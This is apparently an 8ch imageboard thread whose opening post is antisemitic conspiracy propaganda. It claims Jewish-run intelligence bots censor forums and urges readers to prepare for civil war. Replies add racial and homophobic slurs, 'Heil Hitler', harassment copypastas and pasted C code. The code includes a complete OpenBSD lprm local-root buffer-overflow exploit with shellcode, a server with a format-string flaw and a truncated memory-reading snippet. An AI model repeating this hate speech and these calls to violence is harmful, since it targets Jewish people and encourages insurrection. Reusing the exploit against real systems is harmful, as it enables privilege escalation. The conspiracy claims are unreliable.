You are being bluepilled

You are being bluepilled.

8ch is most likely run by intelligence contractors. The mods are completely compromised.
They use bots and outright censorship to drown out any voices going against their agenda. They are trying to establish this place as an 'alt-lite CNN' to keep you asleep.

The goal is to keep you unmotivated and apathetic by bombarding you with meaningless garbage, and above all, to condition you to believe that effective activism entails nothing else but sitting at a computer. It's one big blackpill.

Any post that might lead to you thinking about improving your circumstances is targeted.
The three main strategies are
1) Just delete or anchor the thread
2) Flooding the thread with negative comments and what I guess are supposed to be "entertaining" memes to put you at ease and make you more likely to take the bait
3) Making replies that roughly agree with OP but add in some element of insanity like "meme magic", "esoterism", or random murder/destruction to try to associate OP with mental illness etc.
See the links at the bottom for evidence of #2. Just look at this thread for evidence of #3, I'll screencap some examples ASAP.

Simple fact: Censorship is 100% jewish. The truth does not fear competition from lies, because it stronger than any lie. Truth is the primary tool and weapon of Aryans in everything we do.

Haven't you ever wondered why NO ONE ever seems to call for real action against our enemies?
TOR gives you perfect anonymity with minimal effort and most people know it, so it's not just the 'chilling effect' from mass surveillance. The truth is that most every popular forum is censored by the government through intelligence contractors.
They infiltrate moderation positions, they hostilely take over ownership of websites, and they send swarms of bluepill AI bots to forge a false consensus that we should sit around here doing nothing while our people are being burned away from the inside by this insane jewish society.
They are taking over everywhere, they are taking over everything. Forgot about Gamergate already?
STOP tolerating this bluepill bullshit.

NO
It means you actually start doing what it takes to fight back and remove the problem from our civilization.

We don't need more proof of the jewish problem. We don't need to "redpill" more people. We already have the numbers we need. Don't underestimate the strength of a small group of determined people (see: American Revolution).
We need YOU to get ACTUALLY redpilled, we need you to get in fighting shape, and BRING CIVIL WAR. How else to you imagine anything will change? The fact is that the vast majority of people will not accept the redpill until this jewish society starts cracking. They are too sedated, too enthralled with their entertainments and material goods.
But anyway, do you think you can do better in the propaganda game than the jewish system with their mass-surveillance/media apparatus?
Do you think the corrupt system will shut itself down?
Do you think this will be the first peaceful revolution in our history?
American Revolution II will no doubt entail more sacrifice than American Revolution I.
"Shitposting" and "meme magic" will not cut it. We will all have to make sacrifices for the freedom of our people. You should be thinking about what you are willing to sacrifice.

If the civil war broke out tomorrow, ask yourself honestly - what would you do? Would you be prepared? What would you have to do to be prepared?
PRIORITIZE YOUR PREPARATION
Find friends willing to take preparation seriously and don't let go of them. Don't be afraid to live your life because of spooks….they simply do not have the resources to stop you. They are completely invested in propaganda as a solution to our threat.

A good starting point might be
>>>/meadhall/
Also there are a lot of right-wing book clubs you can search for that discuss ideas and that can help you make connections. Branch out, don't be so paranoid you stop functioning.

We do not have very much time. We can't survive another generation of this subjugation. We will have to take action soon.

Other urls found in this thread:

ibb.co/gujKyw
ibb.co/hqJq5b
twitter.com/NSFWRedditVideo

This is bottom-tier bot logic.
No one is going to arrest you for meeting up and talking to people. No one is going to arrest you for going to the gym. No one is going to arrest you for reading books. No one is going to arrest you for posting anonymously on the internet.
You have all the tools to make yourself valuable to the movement, and when the time comes to fight, you can be ready and pull your weight and more.
WAKE UP. DO SOMETHING THAT MATTERS.

Posting propaganda like this is the easiest thing in the world to do with TOR and VPNs. We need to rid ourselves of the bluepill culture. The internet forums are a major introduction point for young people. Speak out! Wake others up to the facts. Don't let some worthless jews destroy the constructive aspects of our culture and bluepill innocent youngsters.
Do not submit to the flimsy authority of these jewish bastards. Never forget that the First Amendment is on your side.
Your posts will get spammed with fake replies and eventually deleted. Don't stop. People will see it, they will react, and when they see how automatic the censorship is, they will start to believe and realize what is happening, they will become motivated to do something.

Pay attention to this one! AI will suprise you with what it's able to pick up from what you say, and can even interpret images. Don't reply to anyone you suspect of being a bot! You would only teach it to be more convincing.

One day when I refused to have this thread be censored for 5+ hrs it was constantly spammed with bot garbage.
This is what the kike strategy of 'Always Double Down' looks like. They are trying to play off of the common misconception that if they are called out they would stop. No, they just keep going harder than ever. They are betting that you will find the truth of the bot swarms too much to believe. They think they can condition you into believing a manufactured consensus. Not recognizing this pattern could be a fatal mistake.

Evidence of compromised mods and bot net:
part 1: ibb.co/gujKyw
part 2: ibb.co/hqJq5b

Where's you proof 8ch is compromised when anyone can make a board? Sure Holla Forums's mods are compromised since there's proof of that on >>>/polk/ . But where is the proof 8ch is compromised faggot op?

I have never actually won a single one of these threads.

Everytime I see that comically anthropomorphized banana holding his peel in a suggestive manner, likening the peel to clothes and his peel-less nature to human nudity, I bust up laughing. This happens every time, no matter where I am, be it the house or the bus or in class. Sometimes I laugh just thinking about it. This is a dark memory but a few months back I had just gotten done with a fit of laughter caused by one of these hilarious threads. Suddenly my mom walks in and she's crying. I attempted to suppress the growing urge to laugh but it was getting more difficult. Face red, tears running down her aging face, mom grabs my shoulders and says "Your father's dead."

It was at that moment that I couldn't hold back anymore. I burst into a banana-induced fit of laughter, but the horrible news drew tears to my eyes. I laughed while I cried, tears streaming down my wide open grin, memories of daddy resurfacing and being melded and combined with the naked banana.

I lost two things that night.

Ok..

bots!

Heil Hitler

That's still annoying FYI

No OP, you're only trying to bluepill us. It isn't working.

:^)

Fuck off lolipill faggot

What's annoying faggot?

Put up or shut up, nigger. Please tell everyone what your plans to trigger civil war are.

There he is. There he goes again. Look, everyone! He posted it once again! Isn’t he just the funniest guy around?! Oh my God.

I can almost see your pathetic overweight frame glowing in the dark, lit by your computer screen which is the only source of light in your room, giggling like a like girl as you once again type your little Banana thread up and fill in the captcha. Or maybe you don’t even fill in the captcha. Maybe you’re such a disgusting NEET that you actually paid for a 4chan pass, so you just choose the picture. Oh, and we all know the picture. The “epic” Banana guy, isn’t it? I imagine you little shit laughing so hard as you click it that you drop your Doritos on the floor, but it’s ok, your mother will clean it up in the morning. Oh, that’s right. Did I fail to mention? You live with your mother. You are a fat fucking fuckup, she’s probably so sick of you already. So sick of having to do everything for you all goddamn day, every day, for a grown man who spends all his time on 4chan posting about a fucking banana. Just imagine this. She had you, and then she thought you were gonna be a scientist or an astronaut or something grand, and then you became a NEET. A pathetic Bananafag NEET. She probably cries herself to sleep everyday thinking about how bad it is and how she wishes she could just disappear. She can’t even try to talk with you because all you say is “I REALLY REALLY LIKE THIS PICTURE.” You’ve become a parody of your own self. And that’s all you are. A sad little man laughing in the dark by himself as he prepares to indulge in the same old dance that he’s done a million times now. And that’s all you’ll ever be.

whoa

Reported for making absolutely no effort whatsoever

Global report.

angry robo

Good to see you again Lain. Keep up the good work.

Lain is fake and gay.

Robots accusing everyone of being robots is CleverBot-tier, mate.

why the fuck is this happening

Gotchya cianigger A.I. DELETE YOURSELF FAGGOT $(DROP_TABLE)

Mods are trolling us now. /r/4chan is becoming a safe space for bad banana posts. Help us plz.

was that actually supposed to do something? Or are you just LARPing as usual?

Fuck you cianigger A.I parse this faggot. I can copypaste just like you. #include
#include
#include
#include
#ifdef _WIN32
# include
#else
# include
# include
# include
# include
# define SOCKET int
#endif
#define END_LINE '\n'
void logit(FILE *fp, char *client, char *message);
int read_line(int fd, char *buf, int buf_size);
void reverse(char *dest, const char *source);
int write_client(int fd, const char *fmt, …);
void winsock_init();
int main(int argc, char *argv[]) {
SOCKET listenfd, sockfd;
int clientLen, serverPort;
char reversed_line[100];
struct sockaddr_in clientAddress, serverAddress;
char line[500];
FILE *fpLog = NULL;
int secret = 0xDEADC0DE;
int clientQuit = 0;
if (argc != 2)
{
printf("Usage: %s \n", argv[0]);
return 1;
}
#ifdef _WIN32
winsock_init();
#endif
serverPort = atoi(argv[1]);
/* create socket */
listenfd = socket(PF_INET, SOCK_STREAM, 0);
if ( listenfd < 0 )
{
perror("socket error ");
return 1;
}
/* bind server port */
memset(&serverAddress, 0, sizeof(serverAddress));
serverAddress.sin_family = AF_INET;
// serverAddress.sin_addr.s_addr = htonl(INADDR_ANY);
serverAddress.sin_addr.s_addr = inet_addr("127.0.0.1");
serverAddress.sin_port = htons(serverPort);
if ( -1 == bind(listenfd, (struct sockaddr *) &serverAddress, sizeof(serverAddress)) )
{
perror("bind error");
return 1;
}
if (-1 == listen(listenfd, 5))
{
perror("listen error");
return 1;
}
fpLog = fopen("server.log", "w");
if (fpLog == NULL)
{
perror("couldn't open server.log for writing");
return 1;
}
while ( ! clientQuit )
{
printf("%s: waiting for connection on TCP port %u\n\n", argv[0], serverPort);
clientLen = sizeof(clientAddress);
sockfd = accept(listenfd, (struct sockaddr *) &clientAddress, &clientLen);
if ( -1 == sockfd )
{
perror("error accepting connection ");
return 1;
}
write_client(sockfd, "Type QUIT on a line by itself to quit\n");
/* init line */
memset(line, 0, sizeof(line));
clientQuit = 0;
while ( !clientQuit && read_line(sockfd, line, sizeof(line)) != 0)
{
printf( "%s:%d %s\n",
inet_ntoa(clientAddress.sin_addr),
ntohs(clientAddress.sin_port),
line);
if (0 == strncmp(line, "QUIT", 4))
{
clientQuit = 1;
write_client(sockfd, "Goodbye\n");
close(sockfd);
}
else
{
reverse(reversed_line, line);
write_client(sockfd, reversed_line);
write_client(sockfd, "\n");
// logit(fpLog, inet_ntoa(clientAddress.sin_addr), line);
}
memset(line, 0, sizeof(line));
}
}
#ifdef _WIN32
WSACleanup();
#endif
}
int write_client(int fd, const char *fmt, …)
{
va_list args;
char message[100];
if (fmt == NULL)
return 0;
va_start(args, fmt);
#ifdef _WIN32
vsprintf(message, fmt, args);
#else
vsnprintf(message, sizeof(message), fmt, args);
#endif
va_end(args);
return send(fd, message, strlen(message), 0);
}
int read_line(int fd, char *buf, int buf_size)
{
int nleft, nread, buf_len;
nleft = buf_size;
while (nleft > 0)
{
if ((nread = recv(fd, buf, nleft, 0)) < 0)
{
return nread;
}
else if (nread == 0)
{
break;
}
nleft -= nread;
buf += nread;
if (*(buf - 1) == END_LINE)
{
break;
}
}
buf_len = buf_size - nleft;
if (buf_len > 0)
{
*(buf - 1) = '\0';
}
return buf_len;
}
void logit(FILE *fp, char *client, char *message)
{
fprintf(fp, "%s", client);
fprintf(fp, message);
fprintf(fp, "\n");
fflush(fp);
}
void reverse(char *dest, const char *source)
{
int len, i;
len = strlen(source);
i = 0;
while (len > 0)
{
dest[i++] = source[–len];
}
dest[i] = '\0';
}
#ifdef _WIN32
void winsock_init()
{
static WSADATA wsaData;
int wsaret;
if (WSAStartup(MAKEWORD(2,2), &wsaData) != NO_ERROR)
{
fprintf(stderr, "Couldn't start winsock\n");
WSACleanup();
exit(1);
}
}
#endif

Still waiting for your response, faggot. Tell us what your plans to trigger civil war are. Surely you have some ideas you’re willing to offer up, instead of putting the onus on everyone else. Get everyone started.

You call that a copypaste

What the fuck did you just fucking say about me, you little bitch? I’ll have you know I graduated top of my class in the Navy Seals, and I’ve been involved in numerous secret raids on Al-Quaeda, and I have over 300 confirmed kills. I am trained in gorilla warfare and I’m the top sniper in the entire US armed forces. You are nothing to me but just another target. I will wipe you the fuck out with precision the likes of which has never been seen before on this Earth, mark my fucking words. You think you can get away with saying that shit to me over the Internet? Think again, fucker. As we speak I am contacting my secret network of spies across the USA and your IP is being traced right now so you better prepare for the storm, maggot. The storm that wipes out the pathetic little thing you call your life. You’re fucking dead, kid. I can be anywhere, anytime, and I can kill you in over seven hundred ways, and that’s just with my bare hands. Not only am I extensively trained in unarmed combat, but I have access to the entire arsenal of the United States Marine Corps and I will use it to its full extent to wipe your miserable ass off the face of the continent, you little shit. If only you could have known what unholy retribution your little “clever” comment was about to bring down upon you, maybe you would have held your fucking tongue. But you couldn’t, you didn’t, and now you’re paying the price, you goddamn idiot. I will shit fury all over you and you will drown in it. You’re fucking dead, kiddo.

Ok try this then cianigger.

#include
#include
#include
#include
#include

#define LPRMPROG "/usr/bin/lprm"
#define BUFSIZE 511
#define OFFSET 0
#define NOP 0x90

static char obsdcode[] =
"\x31\xc0" /* xorl %eax, %eax */
"\x50" /* pushl %eax */
"\x50" /* pushl %eax */
"\xb0\xb7" /* movb $0xb7, %al */
"\xcd\x80" /* int $0x80 */
"\xb0\x19" /* movb $0x19, %al */
"\x50" /* pushl %eax */
"\x50" /* pushl %eax */
"\x50" /* pushl %eax */
"\xb0\x17" /* movb $0x17, %al */
"\xb0\x2b" /* movb $0x2b, %al */
"\x50" /* pushl %eax */
"\x50" /* pushl %eax */
"\x50" /* pushl %eax */
"\xb0\xb5" /* movb $0xb5, %al */
"\x50" /* pushl %eax */
"\x68\x2f\x2f\x73\x68" /* pushl $0x68732f2f */
"\x68\x2f\x62\x69\x6e" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp, %ebx */
"\x50" /* pushl %eax */
"\x53" /* pushl %ebx */
"\x89\xe2" /* movl %esp, %edx */
"\x50" /* pushl %eax */
"\x52" /* pushl %edx */
"\x53" /* pushl %ebx */
"\x50" /* pushl %eax */
"\xb0\x3b" /* movb $0x3b, %al */
"\x40" /* inc %eax */
"\x50" /* pushl %eax */
"\x50" /* pushl %eax */
"\xcd\x80"; /* int $0x80 */

u_long
getesp(void)
{
asm("movl %esp, %eax");
}

void
usage(u_char *pname)
{
printf("\n OpenBSD lprm(1) local root exploit by CMN \n");
printf("\nUsage: %s printer [-o offs] [-r ret] [-a indent]\n\n",
pname);
}

int
main(int argc, char *argv[])
{
int i;
u_char indent = 0;
u_long raddr = 0;
u_long offset = 0;
u_char buf[BUFSIZE+1];

if (argc < 2) {
usage(argv[0]);
exit(1);
}

argc–;
argv++;

while ( (i = getopt(argc, argv, "a:r:o:")) != -1) {
switch (i) {
case 'a':
indent = atoi(optarg) % 8;
break;

case 'r':
raddr = strtoul(optarg, NULL, 0);
break;

case 'o':
offset = strtoul(optarg, NULL, 0);
break;

default:
exit(1);
break;
}
}

if (!raddr) {
raddr = getesp();
raddr -= offset ? offset : OFFSET;
}
else
raddr -= offset;

printf("Using address 0x%08x\n", raddr);

memset(buf, NOP, BUFSIZE);
memcpy(&buf[BUFSIZE-(indent+4)], &raddr, sizeof(raddr));
memcpy(&buf[BUFSIZE-(indent+8)], &raddr, sizeof(raddr));
memcpy(&buf[BUFSIZE-(indent+12)], &raddr, sizeof(raddr));
memcpy(&buf[BUFSIZE-(indent+16)], &raddr, sizeof(raddr));
memcpy(&buf[BUFSIZE-(indent+20)], &raddr, sizeof(raddr));
memcpy(&buf[BUFSIZE-(indent+24)], &raddr, sizeof(raddr));
memcpy(&buf[BUFSIZE]-(strlen(obsdcode)+100),
obsdcode, strlen(obsdcode));
buf[BUFSIZE] = '\0';

execlp(LPRMPROG, "CMN", "-P", argv[0], buf, buf, NULL);
exit(1);
}

ITT: "operators" whose job it is to beat up on little kids and who believe they deserve respect and salary for this

heads up

The cheating fagot isn't waiting for his old thread to get deleted anymore. He started a new one >>10750880

Wow.

You say that unironically but you aren't far from the truth.

So loire if that's even your real codename. What's loire stand for?
#include
#include
#include
#include

int main(int argc, char **argv){

char *name;
unsigned long *pointer;
int i;

name = getlogin();
printf("getlogin: %s\n\n", name);
pointer = (unsigned long *)(name + strlen(name) + 1);
for(i = 0; i < 3; i++){